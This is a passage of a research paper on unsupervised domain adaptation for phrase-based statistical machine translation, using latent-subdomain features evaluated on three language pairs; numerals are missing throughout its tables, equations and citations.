give a preference towards using shorter phrases as they are inherently less do- main specific. in contrast to phrase domain speci- ficity, phrase pair coherence reflects whether can- didate target and source phrases are typically used in the same set of domains. the intuition here is that the more divergent the distributional behaviour of source and target phrases across subdomains, the less certain we are whether this phrase pair is valid for the unknown target domain. in other words, a translation rule with source and target phrases hav- ing two similar distributions over the latent subdo- mains is likely safer to use. weights for these features, alongside all other standard features, are tuned on a development set. importantly, we show that there is no noteworthy benefit from tuning the weights on a sample from the target domain. it is enough to tune them on a mixed-domain dataset sufficiently different from the training data. we attribute this attractive prop- erty to the fact that our features, unlike the ones typically considered in standard domain-adaptation work, are generic and only affect the amount of risk our system takes. in contrast, for example, in ei- delman et al. ( ), chiang et al. ( ), hu et al. ( ), hasler et al. ( ), su et al. ( ), sen- nrich ( b), chen et al. ( b), and carpuat et al. ( ), features capture similarities between a target domain and each of the training subdomains. clearly, domain adaptation with such rich features, though potentially more powerful, would not be pos- sible without a development set closely matching the target domain. we conduct our experiments on three language pairs and explore adaptation to domain adapta- tion tasks in total. we observe significant and con- sistent performance improvements over the baseline domain-agnostic systems. this result confirms that our two features, and the latent subdomains they are computed from, are useful also for the very chal- lenging domain adaptation setting considered in this work. domain-invariance for phrases at the core of a standard state-of-the-art phrase- based system (koehn et al., ; och and ney, ) lies a phrase table {〈ẽ, f̃〉} ex- tracted from a word-aligned training corpus together with estimates for phrase translation probabilities pcount(ẽ| f̃) and pcount(f̃| ẽ). typically the phrases and their probabilities are obtained from large paral- lel corpora, which are usually broad enough to cover a mixture of several subdomains. in such mixtures, phrase distributions may be different across different subdomains. some phrases (whether source or tar- get) are more specific for certain subdomains than others, while some phrases are useful across many subdomains. moreover, for a phrase pair, the distri- bution over the subdomains for its source side may be similar or not to the distribution for its target side. source phrase projection domain.i... ...domain. domain.k target phrase projection figure : the projection framework of phrases into k- dimensional vector space of probabilistic latent subdo- mains. coherent pairs seem safer to employ than pairs that exhibit different distributions over the subdomains. these two factors, domain specificity and domain coherence, can be estimated from the training cor- pus if we have access to subdomain statistics for the phrases. in the setting addressed here, the subdo- mains are not known in advance and we have to con- sider them latent in the training data. therefore, we introduce a random variable z ∈ { , . . . , k} encoding (arbitrary) k latent subdo- mains that generate each source and target phrase ẽ and f̃ of every phrase pair 〈ẽ, f̃〉. in the next sec- tion, we aim to estimate distributions p(z| ẽ) and p(z| f̃) for subdomain z over the source and target phrases respectively. in other words, we aim at pro- jecting phrases onto a compact (k− ) dimensional simplex of subdomains with vectors: ~̃e = [ p(z = | ẽ), . . . , p(z = k| ẽ) ] , ( ) ~̃ f = [ p(z = | f̃), . . . , p(z = k| f̃) ] . ( ) each of the k elements encodes how well each source and target phrase expresses a specific latent subdomain in the training data. see fig. for an illustration of the projection framework. once the projection is performed, the hidden cross-domain translation behaviour of phrases and phrase pairs can be modeled as follows: • domain-specificity of phrases: a rule with source and target phrases having a peaked distribution over latent subdomains is likely domain-specific. technically speaking, entropy comes as a natural choice for quantifying domain specificity. here, we opt for the renyi entropy and define the do- main specificity as follows: dα(~̃e) = −α log ( k∑ i= p(z = i| ẽ)α ) dα( ~̃ f) = −α log ( k∑ i= p(z = i| f̃)α ) for convenience, we refer to dα(·) as the domain specificity of a phrase. in this study, we choose the value of α as which is the default choice (also known as the collision entropy). • source-target coherence across subdomains: a translation rule with source and target phrases having two similar distributions over the latent subdomains is likely safer to use. we use the chebyshev distance for measuring the similarity between two distributions. the divergence of two vectors ~̃e and ~̃f is defined as follows d(~̃e, ~̃ f) = max i={ ,...,k} ∣∣∣p(z = i|ẽ)−p(z = i|f̃) ∣∣∣ we refer to d(~̃e, ~̃f) as the phrase pair coherence across latent subdomains. we investigated some other similarities for phrase pair coherence (the kullback-leibler divergence and the hellinger distance) but have not observed any noticeable improvements in the performance. we will discuss these experiments in the empirical sec- tion. once computed for every phrase pair, the two measures dα(~̃e), dα( ~̃ f) d(~̃e, ~̃ f), will be integrated into a phrase-based smt system as feature func- tions. latent subdomain induction we now present our approach for inducing latent subdomain distributions p(z| ẽ) and p(z| f̃) for ev- ery source and target phrases ẽ and f̃. in our exper- iments, we compare using our subdomain induction framework with relying on topic distributions pro- vided by a standard topic model, latent dirichlet allocation (blei et al., ). note that unlike lda we rely on parallel data and word alignments when inducing domains. our intuition is that latent vari- ables capturing regularities in bilingual data may be more appropriate for the translation task. inducing these probabilities directly is rather dif- ficult as the task of designing a fully generative phrase-based model is known to be challenging. in order to avoid this, we follow matsoukas et al. ( ) and cuong and sima’an ( a) who “em- bed" such a phrase-level model into a latent subdo- main model that works at the sentence level. in other words, we associate latent domains with sentence pairs rather than with phrases, and use the posterior probabilities computed for the sentences with all the phrases appearing in the corresponding sentences. given p(z| e, f) - a latent subdomain model given sentence pairs 〈e,f〉 - the estimation of p(z| ẽ) and p(z| f̃), for phrases ẽ and f̃, can be simplified by computing expectations z for all z ∈{ , . . . , k}: p(z = i|ẽ) = ∑ e,f p(z = i|e,f)c(ẽ; e)∑k i′= ∑ e,f p(z = i ′|e,f)c(ẽ; e) , p(z = i|f̃) = ∑ e,f p(z = i|e,f)c(f̃; f)∑k i′= ∑ e,f p(z = i ′|e,f)c(f̃; f) . here, c(ẽ,e) is the count of a phrase ẽ in a sentence e in the training corpus. latent subdomains for sentences. we now turn to describing our latent subdomain model for sen- tences. we assume the following generative story for sentence pairs: . generate the domain z from the prior p(z); . choose the generation direction: f-to-e or e-to- f, with equal probability; . if the e-to-f direction is chosen then generate the pair relying on p(e| z)p(f| e, z); . otherwise, use p(f| z)p(e| f, z). formally, it is a uniform mixture of the genera- tive processes for the two potential translation di- doing that requires incorporating into the model additional hidden variables encoding phrase segmentation (denero et al., ). this would significantly complicate inference (mylon- akis and sima’an, ; neubig et al., ; cohn and haffari, ). rections. this generative story implies having two translation models (tms) and two language mod- els (lms), each augmented with latent subdomains. now, the posterior p(z| e, f) can be computed as p(z| e, f) ∝ p(z) ( p(e| z)p(f| e, z) + p(f| z)p(e| f, z) ) . ( ) as we aim for a simple approach, our tms are computed through the introduction of hidden align- ments a and a′ in f-to-e and e-to-f directions re- spectively, in which p(f|e, z) = ∑ a p(f, a|e, z) and p(e| f, z) = ∑ a′ p(e, a ′| f, z). to make the marginalization of alignments tractable, we re- strict p(f, a| e, z) and p(e, a′| f, z) to the same assumptions as ibm model (brown et al., ) (i.e., a multiplication of translation of lexical proba- bilities with respect to latent subdomains). we use standard nth-order markov model for p(e| z) and p(f| z), in which p(e| z) = ∏ i p(ei| e i− i−n, z) and p(f| z) =∏ j p(fj| f j− j−n, z). here, the notation e i− i−n and fj− j−n is used to denote the history of length n for the source and target words ei and fj, respec- tively. training. for training, we maximize the log- likelihood l of the data l = ∑ e,f log (∑ z p(z) ( p(e|z) ∑ a p(f,a|e,z) + p(f| z) ∑ a′ p(e,a′| f, z) )) . ( ) as there is no closed-form solution, we use the expectation-maximization (em) algorithm (demp- ster et al., ). in the e-step, we compute the posterior distribu- note that we effectively average between them which is reasonable, as there is no reason to give preference to any of them. tions p(a, z| e, f) and p(a′, z| e, f) as follows p(a, z| e, f) ∝ p(z) ( p(e| z)p(f, a| e, z) + p(f| z) ∑ a′ p(e, a′| f, z) ) , ( ) p(a′, z| e, f) ∝ p(z) ( p(e| z) ∑ a p(f, a| e, z) + p(f| z)p(e, a′| f, z) ) . ( ) in the m-step, we use the posteriors p(a, z|e, f) and p(a′, z| e, f) to re-estimate parameters of both alignment models. this is done in a very similar way to estimation of the standard ibm model . we use the posteriors to re-estimate lm parame- ters as follows p(ei|ei− ,z) ∝ ∑ e,f p(z|e,f)c(ei ; e), ( ) p(fi|fi− ,z) ∝ ∑ e,f p(z|e,f)c(fi ; f). ( ) to obtain better parameter estimates for word pre- dictions and avoid overfitting, we use smoothing in the m-step. in this work, we chose to apply expected kneser-ney smoothing technique (zhang and chi- ang, ) as it is simple and achieves state-of-the- art performance on the language modeling problem. finally, p(z) can be simply estimated as follows p(z) ∝ ∑ e, f p(z| e, f) ( ) hierarchical training. in practice, we found that training the full joint model leads to brittle perfor- mance, as em is very likely to get stuck in bad lo- cal maxima. to address this difficulty, in our im- plementation, we start out by first jointly training p(z), p(e| z) and p(f| z). in this way in the e-step, we fix our model parameters and compute p(z| e, f) for every sentence pair: p(z| e, f) ∝ p(e| z)p(f| z)p(z). in the m-step, we use the pos- teriors to re-estimate the model parameters, as in equations ( ), ( ) and ( ). once the model is trained, we fix the language modeling parameters and finally train the full model. this parallel latent subdomain language model is less expressive and, consequently, is less likely to get stuck in a local maximum. the lms estimated in this way will then drive the full alignment model to- wards better configurations in the parameter space. in practice, this training scheme is particularly use- ful in case of learning a more fine-grained latent sub- domain model with larger k. experiments training data english french sents . m words . m . m english spanish sents . m words . m . m english german sents . m words . m . m table : data preparation. . data we conduct experiments with large-scale smt sys- tems across a number of domains for three lan- guage pairs (english-spanish, english-german and english-french). the datasets are summarized in table . for english-spanish, we run experiments with training data consisting of m sentence pairs collected from multiple resources within the wmt mt shared task. these include europarl (koehn, ), common crawl corpus, un cor- pus, and news commentary. for english-german, our training data consists of . m sentence pairs collected from the wmt mt shared task, in- cluding europarl, common crawl corpus and news commentary. finally, for english-french, we train smt systems on a corpus of m sentence pairs col- lected from the wmt mt shared task, includ- ing the french-english corpus. we conducted experiments on different domains (tasks) where the data was manually collected by a taus. table presents the translation tasks: each of the tasks deals with a specific domain, each of this task has presumably a very different relevance level this procedure can be regarded as a form of hierarchical estimation: we start with a simpler model and then use it to drive a more expressive model. note that we also use p (z) estimated within the parallel latent subdomain lms to initialize p (z) for the latent subdomain alignment model. https://www.taus.net/. english french professional &business services dev sents k words . k . k test sents k words . k . k leisure, tourism and arts dev sents k words . k . k test sents k words . k . k english spanish professional &business services dev sents k words . k . k test sents k words . k . k legal dev sents k words . k . k test sents k words . k . k financials dev sents k words . k . k test sents k words . k . k english german professional &business services dev sents k words . k . k test sents k words . k . k legal dev sents k words . k . k test sents k words . k . k computer software dev sents k words . k . k test sents k words . k . k computer hardware dev sents k words . k . k test sents k words . k . k table : data and adaptation tasks. to the training data. in this way, we test the stability of our results across a wide range of target domains. . systems we use a standard state-of-the-art phrase-based sys- tem. the baseline system includes moses (koehn et al., ) baseline feature functions, plus eight hi- erarchical lexicalized reordering model feature func- tions (galley and manning, ). the training data is first word-aligned using giza++ (och and ney, ) and then symmetrized with grow(-diag)- final-and (koehn et al., ). we limit the phrase length to the maximum of seven words. the lan- guage models are interpolated -grams with kneser- ney smoothing, estimated by kenlm (heafield et al., ) from a large monolingual corpus of nearly . b english words collected within the wmt mt shared task. finally, we use moses as a de- coder (koehn et al., ). our system is exactly the same as the base- line, plus three additional feature functions induced for the translation rules: two features for domain- specificity of phrases (both for the source side (dα( ~̃ f)) and the target side (dα(~̃e)), and one fea- ture for source-target coherence across subdomains (d(~̃e, ~̃f)). for the projection, we use k= . we also explored different values for k, but have not observed significant difference in the scores. in our experiments we do one iteration of em with paral- lel lms (as described in section ), before contin- uing with the full model for three more iterations. we did not observe a significant improvement from running em any longer. finally, we use hard em, as it has been found to yield better models than the standard soft em on a number of different task (e.g., (johnson, )). in other words, instead of stan- dard ‘soft’ em updates with phrase counts weighted according to the posterior p(z = i| e, f), we use the ‘winner-takes-all’ approach: p(z = i| ẽ)∝ ∑ 〈e,f〉 c(i; ẑ〈e,f〉)δ(ẽ; e), p(z = i| f̃) ∝ ∑ 〈e,f〉 c(i; ẑ〈e,f〉)δ(f̃; f). here, ẑ〈e, f〉 is the “winning" latent subdomain for sentence pair 〈e, f〉: ẑ〈e, f〉 = argmax i∈{ , ..., k} p(z = i| e, f) in practice, we found that using this hard version leads to better performance. . alternative tuning scenarios in order to tune all systems, we use the k-best batch mira (cherry and foster, ). we report the translation accuracy with three metrics - bleu a more principled alternative would be to use posterior reg- ularization (ganchev et al., ). task system bleu↑ /∆ meteor↑ /∆ ter↓ /∆ english-french professional & business services baseline . . . our system . /+ . . /+ . . /- . leisure, tourism and arts baseline . . . our system . /+ . . /+ . . /- . english-spanish financials baseline . . . our system . /+ . . /+ . . /- . professional & business services baseline . . . our system . /+ . . /+ . . /- . legal services baseline . . . our system . /+ . . /+ . . /- . english-german computer software baseline . . . our system . /+ . . /+ . . /- . computer hardware baseline . . . our system . /+ . . /+ . . /- . professional & business services baseline . . . our system . /+ . . /+ . . /- . legal services baseline . . . our system . /+ . . /+ . . /- . table : adaptation results when tuning on the in-domain development set. the bold face indicates that the improvement over the baseline is significant. task system bleu↑ /∆ meteor↑ /∆ ter↓ /∆ english-french professional & business services baseline . . . our system . /+ . . /+ . . /- . leisure, tourism and arts baseline . . . our system . /+ . . /+ . . /- . english-spanish financials baseline . . . our system . /+ . . /+ . . /- . professional & business services baseline . . . our system . /+ . . /+ . . /- . legal services baseline . . . our system . /+ . . /+ . . /- . english-german computer software baseline . . . our system . /+ . . /+ . . /- . computer hardware baseline . . . our system . /+ . . /+ . . /- . professional & business services baseline . . . our system . /+ . . /+ . . /- . legal services baseline . . . our system . /+ . . /+ . . /- . table : adaptation results when tuning on the mixed-domain development set. the bold face indicates that the improvement over the baseline is significant. (papineni et al., ), meteor (denkowski and lavie, ) and ter (snover et al., ). we mark an improvement as significant when we ob- tain the p-level of % under paired bootstrap resam- pling (koehn, ). note that better results corre- spond to larger bleu and meteor but to smaller ter. for every system reported, we run the opti- mizer at least three times, before running multeval (clark et al., ) for resampling and significance testing. note that the scores for the systems are av- erages over multiple runs. for tuning the systems we explore two kinds of development sets: ( ) an in-domain develop- ment set of in-domain data that directly exempli- fies the translation task (i.e., a sample of target- domain data), and ( ) a mixed-domain development set which is a full concatenation of development sets from all the available domains for a language pair; this scenario is a more realistic one when no in- domain data is available. in the analysis section we also test these two scenarios against the scenario mixed-domain minus in-domain, which excludes the in-domain development set part from the mixed- domain development set. by exploring the three dif- ferent development sets we hope to shed light on the importance of having samples from the target do- main when using our features. if our features can indeed capture domain invariance of phrases then they should improve the performance in all three set- tings, including the most difficult setting where the in-domain data has been explicitly excluded from the tuning phase. . main results in-domain tuning scenario. table presents the results for the in-domain development set scenario. the integration of the domain-invariant feature functions into the baseline results in a significant improvement across all domains: average + . bleu on two adaptation tasks for english-french, + . bleu on three adaptation tasks for english- spanish and + . bleu on four adaptation tasks for english-german. mixed-domain tuning scenario. while the im- provements are robust and consistent for the in- domain development set scenario, we are espe- cially delighted to see a similar improvement for the mixed-domain tuning scenario (table ). in de- tail, we observe an average + . bleu on two adaptation tasks for english-french, + . bleu on three adaptation tasks for english-spanish and + . bleu on four adaptation tasks for english- german. we would like to emphasize that this performance improvement is obtained without tun- ing specifically for the target domain or using other domain-related meta-information in the training cor- pus. additional analysis we investigate the individual contribution of each domain-invariance feature. we conduct experiments using a basic large-scale phrase-based system de- scribed in koehn et al. ( ) as a baseline. the baseline includes two bi-directional phrase-based models (pcount(ẽ| f̃) and pcount(f̃| ẽ)), three penal- ties for word, phrase and distortion, and finally, the language model. on top of the baseline, we build four different systems, each augmented with a domain-invariance feature. the first feature is the source-target coherence feature, d(ẽ, f̃), where we use the chebyshev distance as our default options. we also investigate the performance of other metrics including the hellinger distance, and the kullback- leibler divergence. our second and third features are the domain specificity of phrases on the source dα(f̃) and on the target dα(ẽ) sides. finally, we also deploy all these three domain-invariance fea- tures dα(f̃) + dα(ẽ) + d(ẽ, f̃)). the experi- ments are conducted for the task legal on english- german. english-german (task: legal) dev system bleu↑ in- domain baseline . +d(ẽ, f̃) . /+ . +dα(ẽ) . /+ . +dα(f̃) . /+ . +dα(f̃) + dα(ẽ) + d(ẽ, f̃) . /+ . mixed- domains baseline . +d(ẽ, f̃) . /+ . +dα(ẽ) . /+ . +dα(f̃) . /+ . +dα(f̃) + dα(ẽ) + d(ẽ, f̃) . /+ . mixed- domains (exclude legal) baseline . +d(ẽ, f̃) . /+ . +dα(ẽ) . /+ . +dα(f̃) . /+ . +dα(f̃) + dα(ẽ) + d(ẽ, f̃) . /+ . table : improvements over the baseline. the bold fact indicates that the difference is statistically sig- nificant. dh(~̃e, ~̃ f) = √ √ ∑ z (√ p (z| ẽ) − √ p (z| f̃) ) . dkl(~̃e, ~̃ f) = ∑ z p (z| ẽ) log p(z| ẽ) p(z| f̃) ; dkl( ~̃ f, ~̃e) = ∑ z p (z| f̃) log p(z| f̃) p(z| ẽ) . german-english (task: legal services) input im jahr befindet der rat über die verpflichtung der elektronischen übertragung solcher aufzeichnungen. reference the council shall decide in on the obligation to transmit such records electronically. baseline in the council is the obligation on the electronic transfer of such records. + dα(f̃) in the council is on the obligation of electronic transfer of such records. + dα(ẽ) in the council is on the obligation of electronic transmission of such records. + d(ẽ, f̃) in the council is on the obligation of electronic transmission of such records. + all in the council is on the obligation of electronic transmission of such records. input die angemessenheit und wirksamkeit der internen verwaltungssysteme sowie die leistung der dienststellen reference for assessing the suitability and effectiveness of internal management systems and the performance of de- partments baseline the adequacy and effectiveness of internal administrative systems as well as the performance of the services + dα(f̃) the adequacy and effectiveness of the internal management systems, as well as the performance of the services + dα(ẽ) the adequacy and effectiveness of internal management systems, as well as the performance of the services + d(ẽ, f̃) the adequacy and effectiveness of the internal administrative systems as well as the performance of the services + all the adequacy and effectiveness of internal management systems, as well as the performance of the services input zur ausführung der ausgaben nimmt der anweisungsbefugte mittelbindungen vor, geht rechtliche verpflich- tungen ein reference to implement expenditure, the authorising officer shall make budget commitments and legal commitments baseline the implementation of expenditure, the authorising officer commitments before, is a legal commitments + dα(f̃) the implementation of expenditure, the authorising officer commitments, is a legal obligations + dα(ẽ) the implementation of expenditure, the authorising officer commitments before, is a legal obligations + d(ẽ, f̃) the implementation of expenditure, the authorising officer commitments before, is a legal commitments + all the implementation of expenditure, the authorising officer commitments before, is a legal obligations table : translation outputs produced by the basic baseline and its augmented systems with additional abstract feature functions derived from hidden domain information. english-german (task: legal) dev metric bleu↑ in-domain chebyshev . /+ . kullback-leibler (dkl(~̃e, ~̃ f)) . /+ . kullback-leibler (dkl( ~̃ f, ~̃e)) . /+ . hellinger . /+ . table : using different metrics as the measure of coherence. table and table present the results. overall, we can see that all domain-invariance features con- tribute to adaptation performance. specifically, we observe the following: • favouring the source-target coherence across sub- domains (i.e., adding the feature d(ẽ, f̃)) pro- vides a significant translation improvement of + . bleu. which specific similarity measure is used does not seem to matter that much (see table ). we obtain the best result (+ . bleu) with the kl divergence (dkl(~̃e, ~̃ f)). however, the differences are not statistically significant. • integrating a preference for less domain-specific translation phrases at the target side (dα(ẽ)) leads to a translation improvement of + . bleu. • doing the same for the source side (dα(f̃)), in turn, leads to an improvement of + . bleu. • augmenting the baseline by integrating all our features leads to the best result, with an improve- ment of + . bleu. • the translation improvement is observed also for training with a development set of mixed domains (even for the mixed-domain minus in-domain setting when excluding the legal data from the mixed development set). • the weights for all domain-invariance features, once tuned, are positive in all the experiments. table presents examples of translations from different systems. for example, the domain- invariant system revises the translation from "elec- tronic transfer" to "electronic transmission" for the english-german task baseline our system +z +z +z +z +z +z +z +z +z +z +z +z hardware . . . . . . . . . . . . . software . . . . . . . . . . . . . p&b services . . . . . . . . . . . . . legal . . . . . . . . . . . . . table : latent subdomain analysis (with bleu score). german phrase "elektronischen Übertragung", and from "internal administrative systems" to "internal management systems" for the german phrase "in- ternen verwaltungssysteme". the revisions, how- ever, are not always successful. for instance, adding dα(ẽ) and dα(f̃) resulted in revising the translation of the german phrase "rechtliche verpflichtungen" to "legal obligations", which is a worse choice (at least according to bleu) than "legal commitments" pro- duced by the baseline. we also present a brief analysis of latent subdomains induced by our projection frame- work. for each subdomain z we integrate the domain posteriors (p(z| ẽ) and p(z| f̃) and the source-target domain-coherence feature∣∣∣p(z| ẽ)−p(z| f̃) ∣∣∣). we hypothesize that when- ever we observe an improvement for a translation task with domain-informed features, this means that the corresponding latent subdomain z is close to the target translation domain. the results are presented in table . apparently, among the latent subdomains, z , z , z , z are closest to the target domain of hardware. their derived feature functions are helpful in improving the translation accuracy for the task. similarly, z , z , z , z , z and z are closest to professional & business, z is closest to software, and z is closest to legal. meanwhile, z , z and z are not relevant to the task of software. similarly, z is not relevant to professional & business, and z , z and z are not relevant to legal. using topic models instead of latent domains. our domain-invariance framework demands access to posterior distributions of latent domains for phrases. though we argued for using our domain induction approach, other latent variable models can be used to compute these posteriors. one natural option is to use topic models, and more specifically lda (blei et al., ). will our domain-invariance framework still work with topic models, and how closely related are the induced latent domains induced with lda and our model? these are the questions we study in this section. we estimate lda at the sentence level in a mono- lingual regime on one side of each parallel corpus (let us assume for now that this is the source side). when the model is estimated, we obtain the pos- terior distributions of topics (we denote them as z, as we treat them as domains) for each source-side sentence in the training set. now, as we did with our phrase induction framework, we associate these posteriors with every phrase both in the source and in the target sides of that sentence pair. phrase and phrase-pair features defined in section are com- puted relying on these probabilities averaged over the entire training set. we try both directions, that is also estimating lda on the target side and transfer- ring the posterior probabilities to the source side. in order to estimate lda, we used gibbs sam- pling implemented in the mallet package (mccal- lum, ) with default values of hyper-parameters (α = . and β = . ). table presents the results for the legal task with three different sys- tem optimization settings. bleu, meteor and ter are reported. as the result suggests, using our induction framework tends to yield slightly better translation results in terms of meteor and espe- cially bleu. however, using lda seems to lead to slightly better translation result in terms of ter. topics in lda-like models encode co-occurrence patterns in bag-of-word representations of sen- tences. in contrast, domains in our domain- induction framework rely on ngrams and word- alignment information. consequently, these mod- note that bilingual lda models (e.g., see hasler et al. ( ), zhang et al. ( )) could potentially produce better results but we leave them for future work. english-german (task: legal) dev algorithms bleu↑ meteor↑ ter↓ in-domain our . . . lda (source) . . . lda (target) . . . mixed-domains our . . . lda (source) . . . lda (target) . . . mixed-domains (exclude legal) our . . . lda (source) . . . lda (target) . . . table : comparison in latent domain induction with various algorithms. els are likely to encode different latent information about sentences. we also investigate translation per- formance when we use both coherence features from lda and coherence features from our own frame- work. table shows that using all the induced co- herence features results in the best translation, no matter which translation metric is used. we leave the exploration of such an extension for future work. english-german (task: legal) dev algorithms bleu↑ meteor↑ ter↓ mixed domains our features . . . lda (source) features . . . all features . . . table : combination of all features. related work and discussion domain adaptation is an important challenge for many nlp problems. a good survey of potential translation errors in mt adaptation can be found in irvine et al ( ). lexical selection appears to be the most common source of errors in domain adap- tation scenarios (irvine et al., ; wees et al., ). other translation errors include reordering errors (chen et al., a; zhang et al., ), align- ment errors (cuong and sima’an, ) and overfit- ting to the source domain at the parameter tuning stage (joty et al., ). adaptation in smt can be regarded as injecting prior knowledge about the target translation task into the learning process. various approaches have so far been exploited in the literature. they can be loosely categorized according to the type of prior knowledge exploited for adaptation. often, a seed in-domain corpus exemplifying the target translation task is used as a form of prior knowledge. various techniques can then be used for adaptation. for ex- ample, one approach is to combine a system trained on the in-domain data with another general-domain system trained on the rest of the data (e.g., see koehn and schroeder ( ), foster et al. ( ), bisazza et al. ( ), sennrich ( b), razmara et al. ( ), sennrich et al. ( ), haddow ( ), joty et al. ( )). rather than using the entire training data, it is also common to combine the in-domain system with a system trained on a selected subset of the data (e.g., see axelrod et al. ( ), koehn and haddow ( ), duh et al. ( ), kirchhoff and bilmes ( ), cuong and sima’an ( b)). in some other cases, the prior knowledge lies in meta-information about the training data. this could be document-annotated training information (eidel- man et al., ; hu et al., ; hasler et al., ; su et al., ; zhang et al., ), and domain- annotated sub-corpora (chiang et al., ; sen- nrich, b; chen et al., b; carpuat et al., ; cuong and sima’an, ). some recent ap- proaches perform adaptation by exploiting a target domain development, or even only the source side of the development set (sennrich, a; carpuat et al., ; carpuat et al., ; mansour and ney, ). recently, there was some research on adapting si- multaneously to multiple domains, the goal related to ours (clark et al., ; sennrich, a). for instance, clark et al. ( ) augment a phrase-based mt system with various domain indicator features to build a single system that performs well across a range of domains. sennrich ( a) proposed to cluster training data in an unsupervised fashion to build mixture models that yield good performance on multiple test domains. however, their approaches are very different from ours, that is minimizing risk associated with choosing domain-specific transla- tions. moreover, the present work deviates radically from earlier work in that it explores the scenario where no prior data or knowledge is available about the translation task during training time. the focus of our approach is to aim for safer translation by re- warding domain-invariance of translation rules over latent subdomains that can be (still) useful on adap- tation tasks. the present study is inspired by zhang et al. ( ) which exploits topic-insensitivity that is learned over documents for translation. the goal and setting we are working on is markedly differ- ent (i.e., we do not have access to meta-information about the training and translation tasks at all). the domain-invariance induced is integrated into smt systems as feature functions, redirecting the decoder to a better search space for the translation over adap- tation tasks. this aims at biasing the decoder to- wards translations that are less domain-specific and more source-target domain coherent. there is an interesting relation between this work and extensive prior work on minimum bayes risk (mbr) objectives (used either at test time (kumar and byrne, ) or during training (smith and eis- ner, ; pauls et al., )). as with our work, the goal of mbr minimization is to select transla- tions that are less “risky". their risk is due to the uncertainty in model predictions, and some of this uncertainty may indeed be associated with domain- variability of translations. still, a system trained with an mbr objective will tend to output most frequent translation rather than the most domain- invariant one, and this, as we argued in the introduc- tion, might not be the right decision when applying it across domains. we believe that the two classes of methods are largely complementary, and leave fur- ther investigation for future work. at a conceptual level it is also related to regular- izers used in learning domain-invariant neural mod- els (titov, ), specifically autoencoders. though they also consider divergences between distributions of latent variable vectors, they use these divergences at learning time to bias models to induce represen- tations maximally invariant across domains. more- over, they assume access to meta-information about domains and consider only classification problems. conclusion this paper aims at adapting machine translation sys- tems to all domains at once by favoring phrases that are domain-invariant, that are safe to use across a variety of domains. while typical domain adapta- tion systems expect a sample of the target domain, our approach does not require one and is directly applicable to any domain adaptation scenario. ex- periments show that the proposed approach results in modest but consistent improvements in bleu, meteor and ter. to the best of our knowledge, our results are the first to suggest consistent and sig- nificant improvement by a fully unsupervised adap- tation method across a wide variety of translation tasks. the proposed adaptation framework is fairly sim- ple, leaving much space for future research. one potential direction is the introduction of additional features relying on the assignment of phrases to do- mains. the framework for inducing latent domains proposed in this paper should be beneficial in this future work. the implementation of our subdomain- induction framework is available at https:// github.com/hoangcuong /udit. acknowledgements we thank anonymous reviewers for their construc- tive comments on earlier versions. we also thank hui zhang for his help on expected kneser-ney smoothing technique. the first author is supported by the expert (exploiting empirical approaches to translation) initial training network (itn) of the european union’s seventh framework programme. the second author is supported by vici grant nr. - - from the netherlands organization for scientific research (nwo). we thank taus for providing us with suitable data. references amittai axelrod, xiaodong he, and jianfeng gao. . domain adaptation via pseudo in-domain data selec- tion. in proceedings of emnlp. arianna bisazza, nick ruiz, and marcello federico. . fill-up versus interpolation methods for phrase- based smt adaptation. in iwslt. david m. blei, andrew y. ng, and michael i. jordan. . latent dirichlet allocation. jmlr. peter f. brown, vincent j. della pietra, stephen a. della pietra, and robert l. mercer. . the mathemat- ics of statistical machine translation: parameter esti- mation. comput. linguist. marine carpuat, hal daume iii, katharine henry, ann irvine, jagadeesh jagarlamudi, and rachel rudinger. . sensespotting: never let your parallel data tie you to an old domain. in proceedings of acl. marine carpuat, cyril goutte, and george foster. . linear mixture models for robust machine translation. in proc. of wmt. boxing chen, george foster, and roland kuhn. a. adaptation of reordering models for statistical ma- chine translation. in proceedings of naacl. boxing chen, roland kuhn, and george foster. b. vector space model for adaptation in statistical ma- chine translation. in proceedings of the acl. colin cherry and george foster. . batch tuning strategies for statistical machine translation. in pro- ceedings of the naacl-hlt. david chiang, steve deneefe, and michael pust. . two easy improvements to lexical weighting. in pro- ceedings of acl (short papers). jonathan clark, chris dyer, alon lavie, and noah a. smith. . better hypothesis testing for statistical machine translation: controlling for optimizer insta- bility. in proceedings of acl (short papers). jonathan clark, alon lavie, and chris dyer. . one system, many domains: open-domain statistical ma- chine translation via feature augmentation. trevor cohn and gholamreza haffari. . an infinite hierarchical bayesian model of phrasal translation. in proceedings of the acl. hoang cuong and khalil sima’an. a. latent do- main phrase-based models for adaptation. in proceed- ings of emnlp. hoang cuong and khalil sima’an. b. latent do- main translation models in mix-of-domains haystack. in proceedings of coling. hoang cuong and khalil sima’an. . latent domain word alignment for heterogeneous corpora. in pro- ceedings of naacl-hlt. arthur dempster, nan laird, and donald rubin. . maximum likelihood from incomplete data via the em algorithm. jrss, series b, ( ): – . john denero, dan gillick, james zhang, and dan klein. . why generative phrase models underperform surface heuristics. in proc. of wmt. michael denkowski and alon lavie. . meteor . : automatic metric for reliable optimization and evalua- tion of machine translation systems. in proc. of wmt. kevin duh, graham neubig, katsuhito sudoh, and ha- jime tsukada. . adaptation data selection us- ing neural language models: experiments in machine translation. in proceedings of the acl. vladimir eidelman, jordan boyd-graber, and philip resnik. . topic models for dynamic translation model adaptation. in acl (short papers). george foster, cyril goutte, and roland kuhn. . discriminative instance weighting for domain adapta- tion in statistical machine translation. in proceedings of emnlp. michel galley and christopher d. manning. . a simple and effective hierarchical phrase reordering model. in proceedings of emnlp. kuzman ganchev, ben taskar, fernando pereira, and jo ao gama. . posterior vs parameter sparsity in latent variable models. in proceedings of nips. barry haddow. . applying pairwise ranked optimi- sation to improve the interpolation of translation mod- els. in proceedings of naacl-hlt. eva hasler, phil blunsom, philipp koehn, and barry haddow. . dynamic topic adaptation for phrase- based mt. in proceedings of eacl. kenneth heafield, ivan pouzyrevsky, jonathan clark, and philipp koehn. . scalable modified kneser-ney language model estimation. in proceedings of the acl (volume : short papers). yuening hu, ke zhai, vladimir eidelman, and jordan boyd-graber. . polylingual tree-based topic models for translation domain adaptation. in proceed- ings of the acl. ann irvine, john morgan, marine carpuat, daume hal iii, and dragos munteanu. . measuring machine translation errors in new domains. in tacl. mark johnson. . why doesn’t em find good hmm pos-taggers? in proceedings of emnlp-conll. shafiq joty, hassan sajjad, nadir durrani, kamla al- mannai, ahmed abdelali, and stephan vogel. . how to avoid unwanted pregnancies: domain adapta- tion using neural network models. in proceedings of emnlp. katrin kirchhoff and jeff bilmes. . submodularity for data selection in machine translation. in emnlp. philipp koehn and barry haddow. . towards effec- tive use of training data in statistical machine transla- tion. in proceedings of the wmt. philipp koehn and josh schroeder. . experiments in domain adaptation for statistical machine translation. in proceedings of wmt. philipp 